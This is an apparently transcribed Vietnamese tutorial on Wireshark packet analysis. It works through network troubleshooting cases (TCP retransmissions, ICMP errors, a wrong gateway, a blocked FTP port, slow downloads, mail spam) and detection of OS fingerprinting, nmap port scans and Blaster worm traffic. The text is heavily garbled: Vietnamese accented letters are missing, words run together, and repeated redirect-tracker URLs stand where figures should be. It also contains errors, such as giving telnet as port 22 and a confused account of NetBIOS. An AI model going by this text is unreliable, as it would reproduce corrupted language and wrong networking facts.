Phan Tich Goi Tin WIRESHARK

7/31/2019 Phan Tich Goi Tin WIRESHARK

1/30

1. Mt s tnh hung c bn

Trong phn ny chng ta s cp n vn c th hn. S dng Wireshark v phn tch gitin gii quyt mt vn c th ca mng.

Chng ti xin a ra mt s tnh hung in hnh.

A Lost TCP Connection (mt kt ni TCP)

Mt trong cc vn ph bin nht l mt kt ni mng.Chng ta s b qua nguyn nhn ti saokt ni b mt, chng ta s nhn hin tng mc gi tin.

V d:

Mt v truyn file b mt kt ni:

Bt u bng vic gi 4 gi TCP ACK t 10.3.71.7 n 10.3.30.1.

Hnh 3.1-1: This capture begins simply enough with a few ACK packets.

Li bt u t gi th 5, chng ta nhn thy xut hin vic gi li gi ca TCP.

Hnh 3.1-2: These TCP retransmissions are a sign of a weak or dropped connection.

Theo thit k, TCP s gi mt gi tin n ch, nu khng nhn c tr li sau mt khong thigian n s gi li gi tin ban u. Nu vn tip tc khng nhn c phn hi, my ngun stng gp i thi gian i cho ln gi li tip theo.


2/30

Nh ta thy hnh trn,TCP s gi li 5 ln, nu 5 ln lin tip khng nhn c phn hi thkt ni c coi l kt thc.

Hin tng ny ta c th thy trong Wireshark nh sau:

Hnh 3.1-4: Windows will retransmit up to five times by default.

Kh nng xc nh gi tin b lii khi s gip chng ta c th pht hin ra mu trt mng bmt l do u.


3/30

Unreachable Destinations and ICMP Codes (khng th chm ti im cui v cc mICMP)

Mt trong cc cng c khi kim tra kt ni mng l cng c ICMP ping. Nu may mn th phamc tiu tr li li iu c ngha l bn ping thnh cng, cn nu khng th s nhn c

thng bo khng th kt ni ti my ch. S dng cng c bt gi tin trong vic ny s cho bnnhiu thng tin hn thay v ch dung ICMP ping bnh thng. Chng ta s nhn r hn cc lica ICMP.

Hnh 3.1-5: A standard ping request from 10.2.10.2 to 10.4.88.88

Hnh di y cho thy thng bo khng th ping ti 10.4.88.88 t my 10.2.99.99.

Nh vy so vi ping thng thng th ta c th thy kt ni b tt 10.2.99.99. Ngoi ra cn ccc m li ca ICMP, v d : code 1 (Host unreachable)


4/30

Hnh 3.1-6: This ICMP type 3 packet is not what we expected.

Unreachable Port (khng th kt ni ti cng)

Mt trong cc nhim v thng thng khc l kim tra kt ni ti mt cng trn mt my ch.Vic kim tra ny s cho thy cng cn kim tra c m hay khng, c sn sang nhn cc yu cugi n hay khng.

V d, kim tra dch v FTP c chy trn mt server hay khng, mc nh FTP s lm vicqua cng 21 ch thng thng. Ta s gi gi tin ICMP n cng 21 ca my ch, nu mych tr li li gi ICMP loi o v m li 2 th c ngha l khng th kt ni ti cng .s

Fragmented Packets

Hnh 3.1-7: This ping request requires three packets rather than one because the data being

transmitted is

above average size.

y c th thy kch thc gi tin ghi nhn c ln hn kch thc gi tin mc nh gi ikhi ping l 32 bytes ti mt my tnh chy Windows.

Kch thc gi tin y l 3,072 bytes.

Determining Whether a Packet Is Fragmented (xc nh v tr gi tin b phn on)

No Connectivity (khng kt ni)

Vn : chng ta c 2 nhn vin mi Hi v Thanh v c sp ngi cnh nhau v ng nhinl c trang b 2 my tnh. Sauk hi c trang b v lm cc thao tc a 2 my tnh vomng, c mt vn xy ra l my tnh ca Hi chy tt, kt ni mng bnh thng, my tnhca Thanh khng th truy nhp Internet.

Mc tiu : tm hiu ti sao my tnh ca Thanh khng kt ni c Internet v sa li .


5/30

Cc thng tin chng ta c

c 2 my tnh u mi c 2 my u c t IP v c th ping n cc my khc trong mng

Ni tm li l 2 my ny c cu hnh khng c g khc nhau.

Tin hnh

Ci t Wireshark trc tip ln c 2 my.

Phn tch

Trc ht trn my ca Hi ta nhn thy mt phin lm vic bnh thng vi HTTP. u tin sc mt ARP broadcast tm a ch ca gateway tng 2, y l 192.168.0.10. Khi my tnh


6/30

ca Hi nhn c thng tin n s bt tay vi my gateway v t c phin lm vic vi HTTPra bn ngoi.

Hnh 3.1-12: His computer completes a handshake, and then HTTP data transfer begins.

Trng hp my tnh ca Thanh

Hnh 3.1-13: Thanhs computer appears to be sending an ARP request to a different IP address.

Hnh trn cho thy yu cu ARP khng ging nh trng hp trn. a ch gateway c trv l 192.168.0.11.

Nh vy c th thy NetBIOS c vn .


7/30

NetBIOS l giao thc c n s c thay th TCP/IP khi TCP/IP khng hot ng. Nh vy lmy ca Thanh khng th kt ni Internet vi TCP/IP.

Chi tit yu cu ARP trn 2 my :

My Hi

My Thanh


8/30

Kt lun: my Thanh t sai a ch gateway nn khng th kt ni Internet, cn t li l192.168.0.10.

The Ghost in Internet Explorer (con ma trong trnh duyt IE)

Hin tng: my tnh ca A c hin tng nh sau, khi s dng trnh duyt IE, trnh duyt tng tr n rt nhiu trang qung co. Khi A thay i bng tay th vn b hin tng thmch kh ng li my cng vn b nh th.

Thng tin chng ta c

A khng tho v my tnh lm My tnh ca A dng Widows XP, IE 6

Tin hnh

V hin tng ny ch xy ra trn my ca A v trang home page ca A b thay i khi bt IE nnchng ta s tip hnh bt gi tin t my ca A. Chng ta khng nht thit phi ci Wireshark trctip t my ca A. Chng ta c th dng k thut

Hubbing Out .

Phn tch


9/30

Hnh 3.1-16: Since there is no user interaction happening on As computer at the time of this

capture, all of these packets going across the wire should set off some alarms.

Chi tit gi tin th 5:

Hnh 3.1-17: Looking more closely at packet 5, we see it is trying to download data from theInternet.


10/30

T my tnh gi yu cu GET ca HTTP n a ch nh trn hnh.

Hnh 3.1-18: A DNS query to the weatherbug.com domain gives a clue to the culprit.

Gi tin tr li bt u c vn : th t cc phn b thay i.

Mt s gi tip theo c s lp ACK.

Sau mt lot cc thay i trn th c truy vn DNS n deskwx.weatherbug.com

y l a ch A khng h bit v khng c nh truy cp.


11/30

Nh vy c th l c mt process no lm thay i a ch trang ch mi khi IE c btln. Dng mt cng c kim tra process n v d nh Process Explore v thy rng c tin trnhweatherbug.exe ang chy. Sau khi tt tin trnh ny i khng cn hin tng trn na.

Thng thng cc tin trnh nh weatherbug c th l virus, spyware.

Giao din Process Explore

Li kt ni FTP

Tnh hung: c ti khon FTP trn Windows Server 2003 update service packs va ci t

xong, phn mm FTP Server hon ton bnh thng, khon ng nhng khng truy nhp c.

Thng tin chng ta c

FTP lm vic trn cng 21Tin hnh

Ci t Wireshark trn c 2 my.

Phn tch


12/30

Client:


13/30

Hnh 3.1-19: The client tries to establish connection with SYN packets but gets no response; then

it sends a

few more.

Client gi cc gi tin SYN bt tay vi server nhng khng c phn hi t server.

Server :


14/30

Hnh 3.1-20: The client and server trace files are almost identical.

C 3 l do c th dn n hin tng trn

FTP server cha chy, iu ny khng ng v FTP server ca chng ta chy nhkim tra lc u

Server qu ti hoc c lu lng qu ln khin khng th p ng yu cu. iu nycng khng chnh xc v server va mi c ci t.

Cng 21 b cm pha clien hocpha server hoc c 2 pha. Sau khi kim tra v thyrng pha Server cm cng 21 c chiu Incoming v Outgoing trong Local SecurityPolicy


15/30

Kt lun

i khi bt gi tin khng cho ta bit trc tip vn nhng n hn ch c rt nhiu trnghp v gip ta a ra suy on chnh xc vn l g.

-----------------------

2. X l cc tnh hung v bng thng mng

Anatomy of a Slow Download (ct li ca vic download chm)

Tnh hung: c mng download rt chm

Tin hnh : t wireshark lng nghe ton b u ra ca mng

Phn thch :hnh nh di y cho thy c rt nhiu kt ni TCP,HTTP iu ny c ngha l crt nhiu kt ni HTTP download d liu v nn chim bng thng ca mng.


16/30

Hnh 3.2-1: We need to filter out all of this HTTP and TCP traffic.

M ca s Alalyze->Expert Infos thy thm thng tin.
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_61fc67mfg9_b


17/30

Hnh 3.2-2: The Expert Infos window shows us chats, warnings, errors, and notes.

Mc nh Expert Infoshin th tt c cc thng tin. Nu ch hin th Error+Warn+Note th tas c cc thng tin sau.


18/30

Hnh 3.2-3: The Expert Infos window (sans chats) summarizes all of the problems with thisdownload.

Hnh trn cho thy:

c rt nhiu kt ni TCP do chng trnh Window update m c hin tng TCP Previous segment lost packetsv cc gi tin TCP gi i b lp ACK

v b drop, khin TCP phi gi li gi tin.

c th 2 nguyn nhn trn chim bng thng ca mng v lm gim tc download.

Kho st tip cc thng tin theo hng ny ta nhn c cc thng tin cc hnh pha di.


19/30

Hnh 3.2-4: Previous segment lost packets indicate a problem.

Hnh 3.2-5: A fast retransmission is seen after a packet is dropped.


20/30

Statistics >TCP Stream Graph > Round Trip Time Graph

Hnh 3.2-6: The round trip time graph for this capture

Cc hnh cho thy d on bc trn l chnh xc. Cc file s khng th c download v nuthi gian ln hn 0.1 s, thi gian l tng l 0,04s.

Kt lun : nguyn nhn do download chm l c nhiu chng trnh Windows update (c thcc my auto update) v hin tng mt gi tin. Nh vy cn tt bt cc chng trnhWindows update.

Did That Server Flash Me?

Tnh hung : anh Thanh phn nn rng khng th truy cp vo mt phn website Novell

download mt s phn mm cn thit. Mi ln truy cp vo site trnh duyt u ti vi tinhng c g hn th na. Mng c vn g khng ?

Thng tin chng ta c: sau khi kim tra s b th tt c cc my tnh u bnh thng tr mytnh ca anh Thanh. Nh vy vn nm my tnh ca anh Thanh.

Tin hnh: ci Wireshark v bt gi tin khi truy cp website Novell trn my ca Thanh


21/30

Phn thch:

Thng tin nhn c khi bt u c kt ni HTTP n website Novell:

Hnh 3.2-18: The capture begins with standard HTTP communication.

T pha client gi gi tin RST kt thckt ni HTTP:
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_67dbvcf3dq_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_669gpngnc7_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_67dbvcf3dq_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_669gpngnc7_b


22/30

Hnh 3.2-19: Packets 28 and 29 present a problem.

L do g khin client gi gi tin RST ? S dng mt trong cc tnh nng cao cp ca Wiresharkl Follow TCP Stream thy chi tit ni dung m pha server Novell tr v khi dng hm GETca HTTP.

Hnh 3.2-20: This Flash request is the source of our problem.

Nh vy c th nhn thy, phn Flash c m di dng PopUp nhng Thanh khng thy g.Kim tra th thy trnh duyt kha tnh nng PopUP.

Kt lun :trnh duyt block popup

POP Goes the Email Server

Tnh hung : gi th chm trong cng domain v khc domain. Thi gian nhn c th t khigi t 5-10 pht.

Thng tin chng ta c:


23/30

Mail ca cng ty s dng mt mail server ring. Mail server dng Post Office Protocol (POP) nhn

Tin hnh:

Bt gi tin ti my mail server

Phn thch:

Thng tin v giao thc POP qua Wireshark

Hnh 3.2-25: This capture includes a lot of POP packets.

Hnh 3.2-26: Changing the time display format gives us an idea of how much data we arereceiving in what amount of time.

S dng Follow TCP Stream xem ni dung th c file nh km th nhn thy nh sau:
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_69fvphdjc7_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_69fvphdjc7_b


24/30

Hnh 3.2-27: The details of packet 1 show information about the email being sent.

File nh km c chn rt nhiu k t ging nhau vo tng kch thc file nh km, kimtra tip s lng mail nh th ny th thy s lng ln.

C th i n kt lun mail server b spam lm cho nng lc x l cc yu cu gi n b gimxung, tng t nh tn cng t chi dch v.

Hng gii quyt : tm v pht hin ngun ca th rc, c th dng blacklist cm cc a chgi th rc.

Kt lun :spam mail vi file attach ln

3. Mt s tnh hung an ninh mng c bn

OS Fingerprinting (Nhn dng OS)


25/30

OS Fingerprinting l mt k thut ph bin c cc haker s dng thu thp cc thng tin vserver t xa, t c nhng thng tin hu ch thc hin cc bc tn cng tip theo.

Nh xc nh cc li c th c vi server mc tiu, chun b cc cng c ph hp cho cuc tncng.

Mt trong cc k thut x dng l gi cc gi tin ICMP t thng dng.

S dng ICMP traffic,dng ping s khng b cnh bo S dng traffic like Timestamp request/reply, Address mask request, Information request

khng ph bin lm.

Hnh 3.3-1: This is the kind of ICMP traffic you dont want to see.

Dng cc ICMP request khng ph bin nh trn i khi s nhn c nhng thng tin t mctiu phn hi li.

Nu cc request c chp nhn th c th dngICMP-based OS fingerprinting scans qutth.

X l : v cc traffic thng thng s khng bao gi thy cc gi ICMP loi 13,15,17 do chng ta c th to ra b lc lc cc gi ny.

V d : icmp .type==13 || icmp .type==15 || icmp .type==17.

A Simple Port Scan (qut cng dng n gin)

Mt trong cc chng trnh qut port nhanh v ph bin nht l : nmap

Mc tiu ca ngi tn cng:


26/30

tm cc port m xc nh cc tunnel b mt

Chng ta c th nhn dng vic qut cng bng cch t my nghe trn my ch cn bo v theo di.

Hnh 3.3-2: A port scan shows multiple connection attempts on various ports.

Nh trn hnh c th nhn ra rng c nhng kt ni rt ng nghi ng gia my 10.100.25.14(local machine) v my 10.100.18.12 (remote computer).

Log file cho thymy tnh t xa (remote computer) gi gi tin n rt nhiu cng khc nhau trnmy local v d cng 21,1028

Nhng c bit l nhng cng nhy cm nh telnet (22), microsoft-ds, FTP (21), v SMTP (25)nhng cng ny c gi s lng gi tin ln hn v y l nhng cng c kh nng xm nhpcao do li ca nhng ng dng s dng cng ny. Cc gi tin c th l cc on m khai thc.

Blaster Worm (Su Blaster)
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_73ctcgc3dv_b


27/30

Hin tng:My tnh pha client hin th ca s thng bo shutdown my trong vng 60s. Ccthng bo ny xut hin lin tc.

Thng tin chng ta c:

my tnh client ci chng trnh dit virus mi nht ti thi im

Tin hnh:

Ci t Wireshark trn my c virus.

Phn tch:

Mn hnh Wireshark th hin cc hnh vi c nguy hi n my tnh ca virus Blaster, cth hin bng mu , en.

Hnh 3.3-9: We shouldnt see this level of network activity with only the timer running on thismachine.

Mt trong cc kinh nghim pht hin virus l xem d liu cc gi tin dng th (raw), rt cths c nhng thng tin hu ch.
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_74drzbrdgc_b


28/30

Hnh 3.3-10: No useful information can be discerned from packet 1.

Sau khi tm mt s gi tin th thy c gi tin mang li thng tin hu ch.

Hnh 3.3-11, chng ta thy c a ch tr n th mc C:\WINNT\System32. Th mc ny lmt trong nhng th mc quan trong nh
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_75c4wd7vdz_b


29/30

tca h iu hnh Windows.

Hnh 3.3-11: The reference to C:\WINNT\System32 means something might be accessing oursystem files.

Tip tc tm thng tin theo cch trn, pht hin ra tn chng trnh ca su Blaster nh hnh3.3-12.
http://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_77ds489ghx_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_76t6c3vfgs_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_77ds489ghx_bhttp://www.guru.net.vn/ct.ashx?id=253e84d1-26fb-407b-952e-9385396e16cb&url=http://docs.google.com/File?id=dg34rcvn_76t6c3vfgs_b


30/30

Hnh 3.3-12: Packet 4 shows a reference to msblast.exe.

Khi xc nh c v tr file ca virus ta s c nhiu cch gii quyt theo cc mc ch khcnhau. i vi ngi dng thng thng th tt tin trnh c tn sau xa cc file virus i

Trong khun kh tiu lun chng ti nu ra mt s vn c bn c th x l bng cch sdng Wireshark v k nng phn tch gi tin.

Ngoi ra cn c rt nhiu tnh hung khc v cc tnh hung nng cao hn tuy nhin chng tikhng cp y.

Cc vn khc bn c c th tham kho thm qua ti liu chng ti nu phn ph lc.

Phan Tich Goi Tin WIRESHARK

Documents

Transcript of Phan Tich Goi Tin WIRESHARK